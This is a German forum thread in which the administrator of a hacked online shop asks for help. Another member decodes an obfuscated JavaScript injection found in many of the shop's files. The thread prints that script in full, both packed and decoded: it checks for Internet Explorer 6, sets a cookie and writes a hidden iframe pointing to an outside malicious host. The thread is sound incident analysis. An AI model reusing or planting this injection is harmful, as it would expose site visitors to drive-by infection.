# Trojaner-Scripte in Shopsystem



## Ador (26. März 2010)

Hallo,

ich kümmere mich gerade um einen befallenen Onlineshop, xt Commerce sp 2.1.
Dieser wurde opfer eines Hackerangriffes und nun gibts dort Probleme mit Trojanern und Scripten.
Gibt es ne möglichkeit, die kompletten Shopdatein ähnlich wie mit einem Virusscanner zu scannen, ein Scanner der eben nach bösartigen Scripten z.B. ausschau hält, nützlicherweise speziell für Webanwendungen?
Die Shopdaten sind offline verfügbar.

mfg


----------



## Ador (30. März 2010)

*Javascript Trojaner*

Hallo,

ich hatte kürzlich einen Hackkerangriff auf ein Shopsystem.
Mehrere Dateien ca >50 wurden unter anderem mit einem Javascript verseucht. Da ich in Javascript nicht sonderlich bewandert bin, könnte mir vielleicht einer beim verstehen helfen?


```
<script>
sa = "%67%72%61%74%6D%2E%6E%65%74";

eval(function(p,a,c,k,e,d)
{
	while(c--)
	{
		if(k[ c])
		{
			p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[ c])
		}
	}
	return p
}
('28(9.8.7("17 6")!=-1&&0.5.7("4=3")==-1){0.5="4=3; 11=13, 14 16 10 14:15:26
12;";0.24("<2 25=1 27=1
23=\'22://"+18+"/19/\'20=\'21:29\'></2>")}',10,30,'document||iframe|s|_mlsdkf|cookie||indexOf|appVersion|navigator|2015|expires|GMT|Mon|||Jul|MSIE|sa|b2b|style|display|http|src|write|width||height|if|none'.split('|')));
</script>
```

Was macht das Script?

mfg ad0r


----------



## Matthias Reitinger (30. März 2010)

Hallo,

dieses Schnipsel führt folgenden Code aus:


```
if (navigator.appVersion.indexOf("MSIE 6") != -1 && document.cookie.indexOf("_mlsdkf=s") == -1) {
    document.cookie = "_mlsdkf=s; expires=Mon, 14 Jul 2015 14:15:26 GMT;";
    document.write("<iframe width=1 height=1 src='http://" + sa + "/b2b/'style='display:none'></iframe>")
}
```
Damit wird bei Benutzern, die den Internet Explorer 6 verwenden und ein Tracking-Cookie nicht gesetzt ist folgendes ausgeführt:

Das Tracking-Cookie wird gesetzt.
Ein Inline-Frame wird erstellt, das die URL http://gratm.net/b2b/ aufruft.

Grüße,
Matthias


----------



## Ador (30. März 2010)

Ok danke. Die von dir genannte Seite ist auf jedenfall keine nette Seite


----------



## bofh1337 (30. März 2010)

Ador hat gesagt.:


> Ok danke. Die von dir genannte Seite ist auf jedenfall keine nette Seite



Nö, sollte auf jede Blackliste 

http://safebrowsing.clients.google....ient=Firefox&hl=de&site=http://gratm.net/b2b/


----------

